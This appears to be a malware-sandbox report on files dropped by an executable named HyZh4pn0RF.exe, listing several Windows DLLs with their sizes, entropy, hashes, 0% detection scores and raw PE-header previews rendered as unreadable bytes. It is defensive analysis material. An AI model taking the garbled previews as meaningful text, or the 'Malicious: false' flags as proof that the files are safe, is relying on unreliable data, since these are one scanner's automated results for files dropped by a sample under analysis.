                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d....e.........." ...%............P........................................p............`.........................................p'......((..P....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):22016
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.143719741413071
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:IUv5cRUtPQtjLJiKMjNrDF6pJgLa0Mp8Q90gYP2lXCM:BKR8I+K0lDFQgLa17zU
                                                                                                                                                                                                                                                                                                MD5:76F88D89643B0E622263AF676A65A8B4
                                                                                                                                                                                                                                                                                                SHA1:93A365060E98890E06D5C2D61EFBAD12F5D02E06
                                                                                                                                                                                                                                                                                                SHA-256:605C86145B3018A5E751C6D61FD0F85CF4A9EBF2AD1F3009A4E68CF9F1A63E49
                                                                                                                                                                                                                                                                                                SHA-512:979B97AAC01633C46C048010FA886EBB09CFDB5520E415F698616987AE850FD342A4210A8DC0FAC1E059599F253565862892171403F5E4F83754D02D2EF3F366
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%.(...0......P.....................................................`.........................................pY.......Z..d............p..................4...@S...............................R..@............@...............................text...X'.......(.................. ..`.rdata..T....@... ...,..............@..@.data...8....`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..4............T..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):17920
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.353267174592179
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:7PHNP3Mj7Be/yB/6sB3yxcb+IMcOYqQViCBD8bg6Vf4A:hPcnB8KSsB34cb+bcOYpMCBDX
                                                                                                                                                                                                                                                                                                MD5:D48BFFA1AF800F6969CFB356D3F75AA6
                                                                                                                                                                                                                                                                                                SHA1:2A0D8968D74EBC879A17045EFE86C7FB5C54AEE6
                                                                                                                                                                                                                                                                                                SHA-256:4AA5E9CE7A76B301766D3ECBB06D2E42C2F09D0743605A91BF83069FEFE3A4DE
                                                                                                                                                                                                                                                                                                SHA-512:30D14AD8C68B043CC49EAFB460B69E83A15900CB68B4E0CBB379FF5BA260194965EF300EB715308E7211A743FF07FA7F8779E174368DCAA7F704E43068CC4858
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.(... ......P.....................................................`..........................................I.......J..d....p.......`..................,....C...............................A..@............@...............................text....'.......(.................. ..`.rdata..8....@.......,..............@..@.data........P.......<..............@....pdata.......`.......>..............@..@.rsrc........p.......B..............@..@.reloc..,............D..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):12288
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.741247880746506
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:0F/1nb2mhQtkgU7L9D037tfcqgYvEJPb:u2f6L9DSJxgYvEJj
                                                                                                                                                                                                                                                                                                MD5:4D9182783EF19411EBD9F1F864A2EF2F
                                                                                                                                                                                                                                                                                                SHA1:DDC9F878B88E7B51B5F68A3F99A0857E362B0361
                                                                                                                                                                                                                                                                                                SHA-256:C9F4C5FFCDD4F8814F8C07CE532A164AB699AE8CDE737DF02D6ECD7B5DD52DBD
                                                                                                                                                                                                                                                                                                SHA-512:8F983984F0594C2CAC447E9D75B86D6EC08ED1C789958AFA835B0D1239FD4D7EBE16408D080E7FCE17C379954609A93FC730B11BE6F4A024E7D13D042B27F185
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):14848
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.212941287344097
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:2F/1nb2mhQtkRySMfJ2ycxFzShJD9bAal2QDeJKcqgQx2QY:M2fKRQB2j8JD2fJagQx2QY
                                                                                                                                                                                                                                                                                                MD5:F4EDB3207E27D5F1ACBBB45AAFCB6D02
                                                                                                                                                                                                                                                                                                SHA1:8EAB478CA441B8AD7130881B16E5FAD0B119D3F0
                                                                                                                                                                                                                                                                                                SHA-256:3274F49BE39A996C5E5D27376F46A1039B6333665BB88AF1CA6D37550FA27B29
                                                                                                                                                                                                                                                                                                SHA-512:7BDEBF9829CB26C010FCE1C69E7580191084BCDA3E2847581D0238AF1CAA87E68D44B052424FDC447434D971BB481047F8F2DA1B1DEF6B18684E79E63C6FBDC5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%..... ......P.....................................................`..........................................9......|:..d....`.......P..@............p..,....3...............................2..@............0...............................text...X........................... ..`.rdata.......0....... ..............@..@.data...8....@.......0..............@....pdata..@....P.......2..............@..@.rsrc........`.......6..............@..@.reloc..,....p.......8..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):14336
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.181291194389683
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:hF/1nb2mhQt7fSOp/CJPvADQHKtxSOvbcqgEvcM+:N2fNKOZWPIDnxVlgEvL
                                                                                                                                                                                                                                                                                                MD5:9D28433EA8FFBFE0C2870FEDA025F519
                                                                                                                                                                                                                                                                                                SHA1:4CC5CF74114D67934D346BB39CA76F01F7ACC3E2
                                                                                                                                                                                                                                                                                                SHA-256:FC296145AE46A11C472F99C5BE317E77C840C2430FBB955CE3F913408A046284
                                                                                                                                                                                                                                                                                                SHA-512:66B4D00100D4143EA72A3F603FB193AFA6FD4EFB5A74D0D17A206B5EF825E4CC5AF175F5FB5C40C022BDE676BA7A83087CB95C9F57E701CA4E7F0A2FCE76E599
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%..... ......P.....................................................`.........................................09.......9..d....`.......P..@............p..,....3...............................2..@............0...............................text...8........................... ..`.rdata..4....0......................@..@.data...8....@......................@....pdata..@....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..,....p.......6..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):14336
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.140195114409974
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:RsiHXqpo0cUp8XnUp8XjEQnlDtJI6rcqgcx2:f6DcUp8XUp8AclDA69gcx2
                                                                                                                                                                                                                                                                                                MD5:8A92EE2B0D15FFDCBEB7F275154E9286
                                                                                                                                                                                                                                                                                                SHA1:FA9214C8BBF76A00777DFE177398B5F52C3D972D
                                                                                                                                                                                                                                                                                                SHA-256:8326AE6AD197B5586222AFA581DF5FE0220A86A875A5E116CB3828E785FBF5C2
                                                                                                                                                                                                                                                                                                SHA-512:7BA71C37AAF6CB10FC5C595D957EB2846032543626DE740B50D7CB954FF910DCF7CEAA56EB161BAB9CC1F663BADA6CA71973E6570BAC7D6DA4D4CC9ED7C6C3DA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%..... ......P.....................................................`..........................................9......0:..d....`.......P..(............p..,....4...............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...h....@......................@....pdata..(....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..,....p.......6..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):13824
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.203867759982304
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:WsiHXqpwUiv6wPf+4WVrd1DFrCqwWwcqgfvE:s6biio2Pd1DFmlgfvE
                                                                                                                                                                                                                                                                                                MD5:FE16E1D12CF400448E1BE3FCF2D7BB46
                                                                                                                                                                                                                                                                                                SHA1:81D9F7A2C6540F17E11EFE3920481919965461BA
                                                                                                                                                                                                                                                                                                SHA-256:ADE1735800D9E82B787482CCDB0FBFBA949E1751C2005DCAE43B0C9046FE096F
                                                                                                                                                                                                                                                                                                SHA-512:A0463FF822796A6C6FF3ACEBC4C5F7BA28E7A81E06A3C3E46A0882F536D656D3F8BAF6FB748008E27F255FE0F61E85257626010543FC8A45A1E380206E48F07C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%............P.....................................................`.........................................p8...... 9..d....`.......P..(............p..,...@3...............................2..@............0...............................text...X........................... ..`.rdata..p....0......................@..@.data...p....@.......,..............@....pdata..(....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):15360
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.478301937972917
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:hZ9WXA7M93g8U7soSchhiLdjM5J6ECTGmDZkRsP0rcqgjPrvE:8Q0gH7zSccA5J6ECTGmDua89gjPrvE
                                                                                                                                                                                                                                                                                                MD5:34EBB5D4A90B5A39C5E1D87F61AE96CB
                                                                                                                                                                                                                                                                                                SHA1:25EE80CC1E647209F658AEBA5841F11F86F23C4E
                                                                                                                                                                                                                                                                                                SHA-256:4FC70CB9280E414855DA2C7E0573096404031987C24CF60822854EAA3757C593
                                                                                                                                                                                                                                                                                                SHA-512:82E27044FD53A7309ABAECA06C077A43EB075ADF1EF0898609F3D9F42396E0A1FA4FFD5A64D944705BBC1B1EBB8C2055D8A420807693CC5B70E88AB292DF81B7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%. ..........P.....................................................`..........................................8.......9..d....`.......P..X............p..,....3...............................1..@............0...............................text............ .................. ..`.rdata.......0.......$..............@..@.data........@.......2..............@....pdata..X....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..,....p.......:..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):18432
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.69608744353984
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:nkP5RjF7GsIyV6Lx41NVYaVmtShQRKAa8+DSngkov:onx7RI26LuuHKz8+DbN
                                                                                                                                                                                                                                                                                                MD5:42C2F4F520BA48779BD9D4B33CD586B9
                                                                                                                                                                                                                                                                                                SHA1:9A1D6FFA30DCA5CE6D70EAC5014739E21A99F6D8
                                                                                                                                                                                                                                                                                                SHA-256:2C6867E88C5D3A83D62692D24F29624063FCE57F600483BAD6A84684FF22F035
                                                                                                                                                                                                                                                                                                SHA-512:1F0C18E1829A5BAE4A40C92BA7F8422D5FE8DBE582F7193ACEC4556B4E0593C898956065F398ACB34014542FCB3365DC6D4DA9CE15CB7C292C8A2F55FB48BB2B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%.*... ......P.....................................................`..........................................I.......J..d....p.......`..................,....D..............................PC..@............@...............................text....).......*.................. ..`.rdata.......@......................@..@.data...8....P.......>..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc..,............F..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):19456
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.7981108922569735
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:qPHNP3MjevhSY/8EBbVxcJ0ihTLdFDuPHgj+kf4D:sPcKvr/jUJ0sbDGAj+t
                                                                                                                                                                                                                                                                                                MD5:AB0BCB36419EA87D827E770A080364F6
                                                                                                                                                                                                                                                                                                SHA1:6D398F48338FB017AACD00AE188606EB9E99E830
                                                                                                                                                                                                                                                                                                SHA-256:A927548ABEA335E6BCB4A9EE0A949749C9E4AA8F8AAD481CF63E3AC99B25A725
                                                                                                                                                                                                                                                                                                SHA-512:3580FB949ACEE709836C36688457908C43860E68A36D3410F3FA9E17C6A66C1CDD7C081102468E4E92E5F42A0A802470E8F4D376DAA4ED7126818538E0BD0BC4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.0..........P.....................................................`..........................................H.......I..d....p.......`..X...............,....C...............................A..@............@...............................text..../.......0.................. ..`.rdata.......@.......4..............@..@.data........P.......B..............@....pdata..X....`.......D..............@..@.rsrc........p.......H..............@..@.reloc..,............J..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):22016
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.865452719694432
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:y1jwGPJHLvzcY1EEerju9LcTZ6RO3RouLKtcyDNOcwgjxo:QjwyJUYToZwOLuzDNB1j
                                                                                                                                                                                                                                                                                                MD5:C8FE3FF9C116DB211361FBB3EA092D33
                                                                                                                                                                                                                                                                                                SHA1:180253462DD59C5132FBCCC8428DEA1980720D26
                                                                                                                                                                                                                                                                                                SHA-256:25771E53CFECB5462C0D4F05F7CAE6A513A6843DB2D798D6937E39BA4B260765
                                                                                                                                                                                                                                                                                                SHA-512:16826BF93C8FA33E0B5A2B088FB8852A2460E0A02D699922A39D8EB2A086E981B5ACA2B085F7A7DA21906017C81F4D196B425978A10F44402C5DB44B2BF4D00A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.8... ......P.....................................................`..........................................Z.......[..d............p..................,... T...............................R..@............P...............................text....6.......8.................. ..`.rdata.......P.......<..............@..@.data........`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..,............T..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):22016
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.867732744112887
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:51jwGPJHLxzcY1EEerju9LcTZ6RO3RouLKtcyDNIegjxo:rjwyJOYToZwOLuzDNI7j
                                                                                                                                                                                                                                                                                                MD5:A442EA85E6F9627501D947BE3C48A9DD
                                                                                                                                                                                                                                                                                                SHA1:D2DEC6E1BE3B221E8D4910546AD84FE7C88A524D
                                                                                                                                                                                                                                                                                                SHA-256:3DBCB4D0070BE355E0406E6B6C3E4CE58647F06E8650E1AB056E1D538B52B3D3
                                                                                                                                                                                                                                                                                                SHA-512:850A00C7069FFDBA1EFE1324405DA747D7BD3BA5D4E724D08A2450B5A5F15A69A0D3EAF67CEF943F624D52A4E2159A9F7BDAEAFDC6C689EACEA9987414250F3B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.8... ......P.....................................................`..........................................Z.......[..d............p..................,... T...............................R..@............P...............................text....6.......8.................. ..`.rdata.......P.......<..............@..@.data........`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..,............T..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):27136
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.860044313282322
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:xFDL3RqE3MjjQ95UnLa+1WT1aA7qHofg5JptfISH2mDDXfgjVx2:jDLh98jjRe+1WT1aAeIfMzxH2mDDIj
                                                                                                                                                                                                                                                                                                MD5:59BA0E05BE85F48688316EE4936421EA
                                                                                                                                                                                                                                                                                                SHA1:1198893F5916E42143C0B0F85872338E4BE2DA06
                                                                                                                                                                                                                                                                                                SHA-256:C181F30332F87FEECBF930538E5BDBCA09089A2833E8A088C3B9F3304B864968
                                                                                                                                                                                                                                                                                                SHA-512:D772042D35248D25DB70324476021FB4303EF8A0F61C66E7DED490735A1CC367C2A05D7A4B11A2A68D7C34427971F96FF7658D880E946C31C17008B769E3B12F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.J..."......P.....................................................`......................................... l.......m..d...............................,....e...............................d..@............`...............................text...hH.......J.................. ..`.rdata..X....`.......N..............@..@.data................`..............@....pdata...............b..............@..@.rsrc................f..............@..@.reloc..,............h..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):27136
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.917025846093607
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:tFYLXRqEnMgj969GUnLa+1WT1aA7qHofg5JptfIS320DXwElrgjhig:PYLB9Mgj0e+1WT1aAeIfMzx320DXD+j
                                                                                                                                                                                                                                                                                                MD5:8194D160FB215498A59F850DC5C9964C
                                                                                                                                                                                                                                                                                                SHA1:D255E8CCBCE663EE5CFD3E1C35548D93BFBBFCC0
                                                                                                                                                                                                                                                                                                SHA-256:55DEFCD528207D4006D54B656FD4798977BD1AAE6103D4D082A11E0EB6900B08
                                                                                                                                                                                                                                                                                                SHA-512:969EEAA754519A58C352C24841852CF0E66C8A1ADBA9A50F6F659DC48C3000627503DDFB7522DA2DA48C301E439892DE9188BF94EEAF1AE211742E48204C5E42
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.J..."......P.....................................................`..........................................l.......m..d...............................,...@f...............................e..@............`...............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data................`..............@....pdata...............b..............@..@.rsrc................f..............@..@.reloc..,............h..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):12800
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.999870226643325
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:DzFRF/1nb2mhQtk4axusjfkgZhoYDQgRjcqgQvEty:DzFd2f64axnTTz5D1gQvEty
                                                                                                                                                                                                                                                                                                MD5:C89BECC2BECD40934FE78FCC0D74D941
                                                                                                                                                                                                                                                                                                SHA1:D04680DF546E2D8A86F60F022544DB181F409C50
                                                                                                                                                                                                                                                                                                SHA-256:E5B6E58D6DA8DB36B0673539F0C65C80B071A925D2246C42C54E9FCDD8CA08E3
                                                                                                                                                                                                                                                                                                SHA-512:715B3F69933841BAADC1C30D616DB34E6959FD9257D65E31C39CD08C53AFA5653B0E87B41DCC3C5E73E57387A1E7E72C0A668578BD42D5561F4105055F02993C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*b..*b..*b..R...*b..Uc..*b.Rc..*b..*c..*b..Ug..*b..Uf..*b..Ua..*b..j..*b..b..*b....*b..`..*b.Rich.*b.................PE..d....e.........." ...%............P.....................................................`..........................................8......89..d....`.......P...............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......(..............@....pdata.......P.......*..............@..@.rsrc........`......................@..@.reloc..,....p.......0..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):13312
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.025153056783597
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:AF/1nb2mhQtks0iiNqdF4mtPjD02A5APYcqgYvEL2x:62f6fFA/4GjDFcgYvEL2x
                                                                                                                                                                                                                                                                                                MD5:C4CC05D3132FDFB05089F42364FC74D2
                                                                                                                                                                                                                                                                                                SHA1:DA7A1AE5D93839577BBD25952A1672C831BC4F29
                                                                                                                                                                                                                                                                                                SHA-256:8F3D92DE840ABB5A46015A8FF618FF411C73009CBAA448AC268A5C619CF84721
